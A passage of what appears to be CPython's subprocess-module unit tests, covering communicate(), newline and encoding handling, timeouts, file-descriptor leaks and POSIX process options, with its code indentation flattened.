# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertEqual(stderr, b"")
def test_universal_newlines_and_text(self):
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug build push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, os_helper.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen(ZERO_RETURN_CMD)
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
self.assertEqual(p.wait(timeout=support.SHORT_TIMEOUT), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen(ZERO_RETURN_CMD, None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen(ZERO_RETURN_CMD, bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
with support.SuppressCrashReport():
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
with self.assertWarnsRegex(RuntimeWarning, 'line buffering'):
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def test_nonexisting_with_pipes(self):
# bpo-30121: Popen with pipes must close properly pipes on error.
# Previously, os.close() was called with a Windows handle which is not
# a valid file descriptor.
#
# Run the test in a subprocess to control how the CRT reports errors
# and to get stderr content.
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
self.skipTest("need msvcrt.CrtSetReportMode")
code = textwrap.dedent(f"""
import msvcrt
import subprocess
cmd = {NONEXISTING_CMD!r}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
try:
subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except OSError:
pass
""")
cmd = [sys.executable, "-c", code]
proc = subprocess.Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True)
with proc:
stderr = proc.communicate()[1]
self.assertEqual(stderr, "")
self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(NONEXISTING_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=support.SHORT_TIMEOUT)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_repr(self):
path_cmd = pathlib.Path("my-tool.py")
pathlib_cls = path_cmd.__class__.__name__
cases = [
("ls", True, 123, "<Popen: returncode: 123 args: 'ls'>"),
('a' * 100, True, 0,
"<Popen: returncode: 0 args: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...>"),
(["ls"], False, None, "<Popen: returncode: None args: ['ls']>"),
(["ls", '--my-opts', 'a' * 100], False, None,
"<Popen: returncode: None args: ['ls', '--my-opts', 'aaaaaaaaaaaaaaaaaaaaaaaa...>"),
(path_cmd, False, 7, f"<Popen: returncode: 7 args: {pathlib_cls}('my-tool.py')>")
]
with unittest.mock.patch.object(subprocess.Popen, '_execute_child'):
for cmd, shell, code, sx in cases:
p = subprocess.Popen(cmd, shell=shell)
p.returncode = code
self.assertEqual(repr(p), sx)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
ZERO_RETURN_CMD, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
def test_class_getitems(self):
self.assertIsInstance(subprocess.Popen[bytes], types.GenericAlias)
self.assertIsInstance(subprocess.CompletedProcess[str], types.GenericAlias)
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = subprocess.run(ZERO_RETURN_CMD, check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
def test_run_with_pathlike_path(self):
# bpo-31961: test run(pathlike_object)
# the name of a command that can be run without
# any arguments that exit fast
prog = 'tree.com' if mswindows else 'ls'
path = shutil.which(prog)
if path is None:
self.skipTest(f'{prog} required for this test')
path = FakePath(path)
res = subprocess.run(path, stdout=subprocess.DEVNULL)
self.assertEqual(res.returncode, 0)
with self.assertRaises(TypeError):
subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)
def test_run_with_bytes_path_and_arguments(self):
# bpo-31961: test run([bytes_object, b'additional arguments'])
path = os.fsencode(sys.executable)
args = [path, '-c', b'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_run_with_pathlike_path_and_arguments(self):
# bpo-31961: test run([pathlike_object, 'additional arguments'])
path = FakePath(sys.executable)
args = [path, '-c', 'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_capture_output(self):
cp = self.run_python(("import sys;"
"sys.stdout.write('BDFL'); "
"sys.stderr.write('FLUFL')"),
capture_output=True)
self.assertIn(b'BDFL', cp.stdout)
self.assertIn(b'FLUFL', cp.stderr)
def test_stdout_with_capture_output_arg(self):
# run() refuses to accept 'stdout' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stdout and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stdout=tf)
self.assertIn('stdout', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
def test_stderr_with_capture_output_arg(self):
# run() refuses to accept 'stderr' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stderr and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stderr=tf)
self.assertIn('stderr', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
# This test _might_ wind up a bit fragile on loaded build+test machines
# as it depends on the timing with wide enough margins for normal situations
# but does assert that it happened "soon enough" to believe the right thing
# happened.
@unittest.skipIf(mswindows, "requires posix like 'sleep' shell command")
def test_run_with_shell_timeout_and_capture_output(self):
"""Output capturing after a timeout mustn't hang forever on open filehandles."""
before_secs = time.monotonic()
try:
subprocess.run('sleep 3', shell=True, timeout=0.1,
capture_output=True) # New session unspecified.
except subprocess.TimeoutExpired as exc:
after_secs = time.monotonic()
stacks = traceback.format_exc() # assertRaises doesn't give this.
else:
self.fail("TimeoutExpired not raised.")
self.assertLess(after_secs - before_secs, 1.5,
msg="TimeoutExpired was delayed! Bad traceback:\n```\n"
f"{stacks}```")
def _get_test_grp_name():
for name_group in ('staff', 'nogroup', 'grp', 'nobody', 'nfsnobody'):
if grp:
try:
grp.getgrnam(name_group)
except KeyError:
continue
return name_group
else:
raise unittest.SkipTest('No identified group name to use for this test on this platform.')
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
# We mock the __del__ method for Popen in the next two tests
# because it does cleanup based on the pid returned by fork_exec
# along with issuing a resource warning if it still exists. Since
# we don't actually spawn a process in these tests we can forego
# the destructor. An alternative would be to set _child_created to
# False before the destructor is called but there is no easy way
# to do that
class PopenNoDestructor(subprocess.Popen):
def __del__(self):
pass
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
"""Test error passing done through errpipe_write in the good case"""
def proper_error(*args):
errpipe_write = args[13]
# Write the hex for the error code EISDIR: 'is a directory'
err_code = '{:x}'.format(errno.EISDIR).encode()
os.write(errpipe_write, b"OSError:" + err_code + b":")
return 0
fork_exec.side_effect = proper_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(IsADirectoryError):
self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
"""Test error passing done through errpipe_write where its not
in the expected format"""
error_data = b"\xFF\x00\xDE\xAD"
def bad_error(*args):
errpipe_write = args[13]
# Anything can be in the pipe, no assumptions should
# be made about its encoding, so we'll write some
# arbitrary hex bytes to test it out
os.write(errpipe_write, error_data)
return 0
fork_exec.side_effect = bad_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(subprocess.SubprocessError) as e:
self.PopenNoDestructor(["non_existent_command"])
self.assertIn(repr(error_data), str(e.exception))
@unittest.skipIf(not os.path.exists('/proc/self/status'),
"need /proc/self/status")
def test_restore_signals(self):
# Blindly assume that cat exists on systems with /proc/self/status...
default_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=False)
for line in default_proc_status.splitlines():
if line.startswith(b'SigIgn'):
default_sig_ign_mask = line
break
else:
self.skipTest("SigIgn not found in /proc/self/status.")
restored_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=True)
for line in restored_proc_status.splitlines():
if line.startswith(b'SigIgn'):
restored_sig_ign_mask = line
break
self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
msg="restore_signals=True should've unblocked "
"SIGPIPE and friends.")
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c", "import os; print(os.getsid(0))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_sid = os.getsid(0)
child_sid = int(output)
self.assertNotEqual(parent_sid, child_sid)
@unittest.skipUnless(hasattr(os, 'setreuid'), 'no setreuid on platform')
def test_user(self):
# For code coverage of the user parameter. We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
uid = os.geteuid()
test_users = [65534 if uid != 65534 else 65533, uid]
name_uid = "nobody" if sys.platform != 'darwin' else "unknown"
if pwd is not None:
try:
pwd.getpwnam(name_uid)
test_users.append(name_uid)
except KeyError:
# unknown user name
name_uid = None
for user in test_users:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(user=user, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getuid())"],
user=user,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
except OSError as e:
if e.errno not in (errno.EACCES, errno.EPERM):
raise
else:
if isinstance(user, str):
user_uid = pwd.getpwnam(user).pw_uid
else:
user_uid = user
child_user = int(output)
self.assertEqual(child_user, user_uid)
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=-1)
with self.assertRaises(OverflowError):
subprocess.check_call(ZERO_RETURN_CMD,
cwd=os.curdir, env=os.environ, user=2**64)
if pwd is None and name_uid is not None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=name_uid)
